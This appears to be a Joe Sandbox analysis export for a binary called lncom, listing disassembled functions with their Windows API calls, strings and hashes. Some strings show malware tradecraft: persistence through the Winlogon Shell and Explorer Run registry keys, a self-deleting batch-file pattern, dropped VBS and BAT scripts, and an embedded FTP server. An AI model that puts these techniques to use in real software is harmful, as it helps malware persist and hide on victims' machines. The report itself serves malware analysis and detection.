Instruction ID: 9b8fc70395f86879dc8bb93cd1dd84d62c78ce803e2ba5018f8204497f76ac1a
Opcode Fuzzy Hash: 1f8947547ea69d9ffdf1fb16a12240e4e23575bae9a75210e941da022269eb7c
Instruction Fuzzy Hash: 51415370E00109AFDF14EFA6C842ADEBBF9EB49305F14943BE400A7261D7385A45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004892C4 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryclipboardwindowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 004892DC
RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 004892E8
RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 004892F7
RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00489303
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0048931B
SendMessageA.USER32(00000000,?,00000000,00000000), ref: 0048933F

Strings

MSWHEEL_ROLLMSG, xrefs: 004892E3
MSH_SCROLL_LINES_MSG, xrefs: 004892FE
Magellan MSWHEEL, xrefs: 004892D2
MouseZ, xrefs: 004892D7
MSH_WHEELSUPPORT_MSG, xrefs: 004892F2

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ClipboardFormatRegister$MessageSend$FindWindow
String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
API String ID: 1416857345-3736581797
Opcode ID: d69fc6688b101ee598b7a887b5d45b43b331f9fe59324a59733bb20093776476
Instruction ID: 90cee2060f9e04b9f9870055c91232f96679e0c8a93fe0c3fdd7d7310ca89000
Opcode Fuzzy Hash: d69fc6688b101ee598b7a887b5d45b43b331f9fe59324a59733bb20093776476
Instruction Fuzzy Hash: C3111F70244705AFE715AF95CC42B7EB7E8EF4D710F294826BD459B3C0D6B99C408B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040F61C Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 209COMMON

Download Yara Rule

APIs

Part of subcall function 00451188: RegCloseKey.ADVAPI32(00010000,00451064,004511DF,00451064,00000001,00451136,?,?,004015B8), ref: 00451199

Part of subcall function 004512FC: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00451401), ref: 00451376

Part of subcall function 00451598: RegDeleteValueA.ADVAPI32(?,00000000,?,?,004049E3), ref: 004515AA

Part of subcall function 00451188: RegFlushKey.ADVAPI32(00010000,00451064,004511DF,00451064,00000001,00451136,?,?,004015B8), ref: 004511A1

Part of subcall function 004512FC: RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00451401), ref: 004513AA

Part of subcall function 00451420: RegEnumKeyExA.ADVAPI32(00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00451540,?,00000000,00451589), ref: 004514F2
Part of subcall function 00451420: RegCloseKey.ADVAPI32(00000000,00451547,00000000,00451589), ref: 0045153A

Part of subcall function 0040E994: GetVersionExA.KERNEL32(00000094), ref: 0040E9D4
Part of subcall function 0040E994: GetWindowsDirectoryA.KERNEL32(?,00000104,00000094), ref: 0040E9FA

SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,00000000,?,00000104), ref: 0040F979

Part of subcall function 0040EDA4: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040EDC3
Part of subcall function 0040EDA4: GetShortPathNameA.KERNEL32(?,?,00000100), ref: 0040EDF1
Part of subcall function 0040EDA4: WinExec.KERNEL32(?,00000000), ref: 0040EE98

Part of subcall function 0040D79C: FindWindowA.USER32(00000000,00000000), ref: 0040D7DB

Strings

SOFTWARE\Microsoft DirectX, xrefs: 0040F86A
Windows services , xrefs: 0040F9C4
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\, xrefs: 0040F714
Shell, xrefs: 0040F770
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\, xrefs: 0040F657
,, xrefs: 0040F9A2
\!\, xrefs: 0040F695
Explorer.exe, xrefs: 0040F74F
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag, xrefs: 0040F806

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CloseFileName$AttributesCreateDeleteDirectoryEnumExecFindFlushModuleOpenPathShortValueVersionWindowWindows
String ID: ,$Explorer.exe$SOFTWARE\Microsoft DirectX$SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\$SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\$Shell$Windows services $\!\
API String ID: 711332803-2460045195
Opcode ID: 31f35956f1e7da38b277c774a19c969a056b2832a3264702884f7b1234376834
Instruction ID: 62af5189773a37174519f8ef731dc4f091b15ec3d503e9f5d4d509eea511deed
Opcode Fuzzy Hash: 31f35956f1e7da38b277c774a19c969a056b2832a3264702884f7b1234376834
Instruction Fuzzy Hash: 3BA1F63491022DCBDB50AB91C845B9DB3B9FF86308F5080EBD44C67262DB755E89CF56

Uniqueness

Uniqueness Score: -1.00%

Function 0043CC58 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175COMMON

Download Yara Rule

APIs

@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%.LNCOM(?), ref: 0043CD9B
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%.LNCOM ref: 0043CDB7
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%.LNCOM(?), ref: 0043CE0D

Part of subcall function 0043ACFC: @Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString.LNCOM(?,00000000,0043AD9E), ref: 0043AD6C

Strings

426 Connection closed; transfer aborted. Error #%d, xrefs: 0043CDE1, 0043CEC7
Program error in ClientStorSessionClosed, xrefs: 0043CEFA
426 Connection closed; %s., xrefs: 0043CD6F, 0043CE58
ftp-data, xrefs: 0043CCD4

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CtrlFtpsrvc@Send$Answer$qqrp22Ftpsrv@Server@SmallSocketr28String$iuc$255%System@%$AnsiAnswer$qqr17Socket@StringSystem@
String ID: 426 Connection closed; %s.$426 Connection closed; transfer aborted. Error #%d$Program error in ClientStorSessionClosed$ftp-data
API String ID: 3895286621-1286945960
Opcode ID: e4d714a580a52518ee4387607f0394e2db8b0fc528323b9136f5c6e683deaf29
Instruction ID: ae5089c938caade52fa0ce6d255d6166b506a7e9f8833dcf1033fcba78015330
Opcode Fuzzy Hash: e4d714a580a52518ee4387607f0394e2db8b0fc528323b9136f5c6e683deaf29
Instruction Fuzzy Hash: B1812374A042598FCB14DB59C885BEEB7F1BF0C304F4094EAE409A7291D738AE85CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00488C38 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 00488C71
GetSystemMetrics.USER32(00000000), ref: 00488C96
GetSystemMetrics.USER32(00000001), ref: 00488CA1
GetClipBox.GDI32(?,?), ref: 00488CB3
GetDCOrgEx.GDI32(?,?), ref: 00488CC0
OffsetRect.USER32(?,?,?), ref: 00488CD9
IntersectRect.USER32(?,?,?), ref: 00488CEA
IntersectRect.USER32(?,?,?), ref: 00488D00

Part of subcall function 00488680: GetProcAddress.KERNEL32(748F0000,00000000), ref: 00488700

Strings

EnumDisplayMonitors, xrefs: 00488C50

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
String ID: EnumDisplayMonitors
API String ID: 362875416-2491903729
Opcode ID: 123912a66d840eb9a908d1b718ec5326ec304ad0fcc3fecf3518f256679d8968
Instruction ID: 412db8737af7d70f40af773f17ab32edb260404158848b98c065803c5d74fe4e
Opcode Fuzzy Hash: 123912a66d840eb9a908d1b718ec5326ec304ad0fcc3fecf3518f256679d8968
Instruction Fuzzy Hash: 75310C72A01109AFDB50EFA5C9449EFB7FCEB19300F40492BF915E6241EB789905CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDA4 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 74processCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040EDC3
GetShortPathNameA.KERNEL32(?,?,00000100), ref: 0040EDF1
WinExec.KERNEL32(?,00000000), ref: 0040EE98

Strings

del %c%s%c, xrefs: 0040EE40
", xrefs: 0040EDAD
%, xrefs: 0040EDB1
del %c0, xrefs: 0040EE76
:1, xrefs: 0040EE1F
if exist %c%s%c goto 1, xrefs: 0040EE61
.bat, xrefs: 0040EDFB

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Name$ExecFileModulePathShort
String ID: "$%$.bat$:1$del %c%s%c$del %c0$if exist %c%s%c goto 1
API String ID: 2768863084-1589107571
Opcode ID: 3e51e7bf7eed38f010d02a7d0a527de0aab47939e48c313ae09b8e76a1676b23
Instruction ID: 640c7ce64ee110724e338500b86037256d3d76147bf9cec400e08b890bf9de98
Opcode Fuzzy Hash: 3e51e7bf7eed38f010d02a7d0a527de0aab47939e48c313ae09b8e76a1676b23
Instruction Fuzzy Hash: 7521B2B2C441183ACF11A7E58C46EEE7F7C6F2A701F0440EEF60464182EABA4B54CB75

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA6C Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 198COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000105,?), ref: 0040CAD1
ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 0040CC6E

Part of subcall function 00401DAC: GetVersionExA.KERNEL32(00000094), ref: 00401DC6

Strings

winoa386.mod, xrefs: 0040CAA3
\scrpt.vbs, xrefs: 0040CB69
8, xrefs: 0040CBF0
open, xrefs: 0040CC67
\scrpt.bat, xrefs: 0040CAEE
open, xrefs: 0040CCEA

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ExecutePathShellTempVersion
String ID: 8$\scrpt.bat$\scrpt.vbs$open$open$winoa386.mod
API String ID: 3800722154-349342630
Opcode ID: 788a259742747fba70f493b365dd2285897114be7a6d3fdb91f5870dd9a1b47e
Instruction ID: 210f4d4ecc89dbf0d66e60159b9cadef1bbd8f9e01a3ce7c9f11c72c57eae3d5
Opcode Fuzzy Hash: 788a259742747fba70f493b365dd2285897114be7a6d3fdb91f5870dd9a1b47e
Instruction Fuzzy Hash: FC710F34A1010DDBDB00EFD1D586BDDB3B9FF99308F20416BE804B6252D7B99E069B69

Uniqueness

Uniqueness Score: -1.00%

Function 00495508 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(USER32,?,?,00495630,?,?,004171D6,00000001,00000000), ref: 00495533
GetProcAddress.KERNEL32(00000000,?), ref: 00495547
GetProcAddress.KERNEL32(00000000,?), ref: 0049555E
GetProcAddress.KERNEL32(00000000,?), ref: 00495571
GetProcAddress.KERNEL32(00000000,?), ref: 00495584
GetProcAddress.KERNEL32(00000000,?), ref: 00495597
GetProcAddress.KERNEL32(00000000,?), ref: 004955AA
GetProcAddress.KERNEL32(00000000,?), ref: 004955BD

Strings

USER32, xrefs: 0049550A, 00495532

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: USER32
API String ID: 667068680-1836903325
Opcode ID: 44714835be3f84bc85d0f888fa3655c57cd2d7b00f987132eb9723609066038b
Instruction ID: 44dfdcf8f6b44518ff679babfeb71daccde62d54a006bc5ab84b0611e5050d7c
Opcode Fuzzy Hash: 44714835be3f84bc85d0f888fa3655c57cd2d7b00f987132eb9723609066038b
Instruction Fuzzy Hash: EA314FF2606F025BE721DF76AC80B6737E9A7543557A4843FA001CA215FB78D448DB24

Uniqueness

Uniqueness Score: -1.00%

Function 0046A3BC Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 0046A407
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 0046A425
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0046A432
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0046A43F
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0046A44C
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0046A459
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0046A466
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0046A473
EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 0046A491
EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 0046A4AD

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: 8125d157e3626be04a73801144c854939cdd700c20292cc6c9d3404aee9bbe59
Instruction ID: 7876f1eb59590f29e50fc4aff64c8f8df01c678a75aa90ebc686799f25af5898
Opcode Fuzzy Hash: 8125d157e3626be04a73801144c854939cdd700c20292cc6c9d3404aee9bbe59
Instruction Fuzzy Hash: 8F212170385745BAE730E625CC8EFDA7AD85B14B08F048495B7447F2D3C6FCAD908669

Uniqueness

Uniqueness Score: -1.00%

Function 00446C34 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 324COMMON

Download Yara Rule

APIs

@Ftpsrvc@PatchIE5$qqrr17System@AnsiString.LNCOM(00000000,004470E9,?,00000000,00000000,?,0043BC9F), ref: 00446C79
@Ftpsrvc@IsUNC$qqr17System@AnsiString.LNCOM(00000000,004470E9,?,00000000,00000000,?,0043BC9F), ref: 00446C8C
@Ftpsrvc@IsUNC$qqr17System@AnsiString.LNCOM(?,00000000,004470E9,?,00000000,00000000,?,0043BC9F), ref: 00446DA2
@Ftpsrvc@IsUNC$qqr17System@AnsiString.LNCOM(?,00000000,004470E9,?,00000000,00000000,?,0043BC9F), ref: 00446E7C

Strings

Cannot accept UNC path, xrefs: 00446CA5
Cannot accept path not relative to current directory, xrefs: 00446F29
Cannot accept relative path using dot notation, xrefs: 00446F50, 00446FE6
Invalid directory name syntax, xrefs: 00446D70

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AnsiFtpsrvc@StringSystem@$C$qqr17$E5$qqrr17Patch
String ID: Cannot accept UNC path$Cannot accept path not relative to current directory$Cannot accept relative path using dot notation$Invalid directory name syntax
API String ID: 1406909265-218512799
Opcode ID: a9eb72d60f0038dbac5f0c4fa82cd1aa5ccd3bb03ddc8158631069bbbaa65b53
Instruction ID: e0a2d6675ae46ff76187fb83983dd79834217215c968aac1c28a11ff382d2516
Opcode Fuzzy Hash: a9eb72d60f0038dbac5f0c4fa82cd1aa5ccd3bb03ddc8158631069bbbaa65b53
Instruction Fuzzy Hash: E5D15374A041099FEF00EF95C985AAEBBF1EF46309F1444B7E404A7352CB38EE459B59

Uniqueness

Uniqueness Score: -1.00%

Function 00440944 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

@Wsocket@TCustomWSocket@SetAddr$qqr17System@AnsiString.LNCOM ref: 004409DD
@Wsocket@WSocket_ntohs$qqrus.LNCOM ref: 00440A9C
@Wsocket@WSocket_htonl$qqri.LNCOM ref: 00440AAC

Strings

227 Entering Passive Mode (%d,%d,%d,%d,%d,%d)., xrefs: 00440B62
227 Entering Passive Mode (127,0,0,1,%d,%d)., xrefs: 00440AE9
$530 Please login with USER and PASS., xrefs: 00440980
tcp, xrefs: 004409FE
0.0.0.0, xrefs: 004409D8

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$Addr$qqr17AnsiCustomSocket@Socket_htonl$qqriSocket_ntohs$qqrusStringSystem@
String ID: $530 Please login with USER and PASS.$0.0.0.0$227 Entering Passive Mode (%d,%d,%d,%d,%d,%d).$227 Entering Passive Mode (127,0,0,1,%d,%d).$tcp
API String ID: 1931586216-3387794462
Opcode ID: c92a617ad80558e3359eb0cbce4da57664989babefe323066bf609356d1bd7ee
Instruction ID: 0c3acfc8558ac53b576819c0e51e0c95707a5088c4c7a34149ec85ac720af31f
Opcode Fuzzy Hash: c92a617ad80558e3359eb0cbce4da57664989babefe323066bf609356d1bd7ee
Instruction Fuzzy Hash: C9811774A042489FDB44DFA9C884BAEBBF0FF49314F1585BAE848AB352DB349945CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0040F6D9 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 176COMMON

Download Yara Rule

APIs

Part of subcall function 00451188: RegCloseKey.ADVAPI32(00010000,00451064,004511DF,00451064,00000001,00451136,?,?,004015B8), ref: 00451199

Part of subcall function 004512FC: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00451401), ref: 00451376

Part of subcall function 00451188: RegFlushKey.ADVAPI32(00010000,00451064,004511DF,00451064,00000001,00451136,?,?,004015B8), ref: 004511A1

Part of subcall function 00451420: RegEnumKeyExA.ADVAPI32(00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00451540,?,00000000,00451589), ref: 004514F2
Part of subcall function 00451420: RegCloseKey.ADVAPI32(00000000,00451547,00000000,00451589), ref: 0045153A

Part of subcall function 0040E994: GetVersionExA.KERNEL32(00000094), ref: 0040E9D4
Part of subcall function 0040E994: GetWindowsDirectoryA.KERNEL32(?,00000104,00000094), ref: 0040E9FA

SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,00000000,?,00000104), ref: 0040F979

Part of subcall function 0040EDA4: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040EDC3
Part of subcall function 0040EDA4: GetShortPathNameA.KERNEL32(?,?,00000100), ref: 0040EDF1
Part of subcall function 0040EDA4: WinExec.KERNEL32(?,00000000), ref: 0040EE98

Part of subcall function 0040D79C: FindWindowA.USER32(00000000,00000000), ref: 0040D7DB

Strings

SOFTWARE\Microsoft DirectX, xrefs: 0040F86A
Windows services , xrefs: 0040F9C4
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\, xrefs: 0040F714
Shell, xrefs: 0040F770
,, xrefs: 0040F9A2
Explorer.exe, xrefs: 0040F74F
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag, xrefs: 0040F806

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
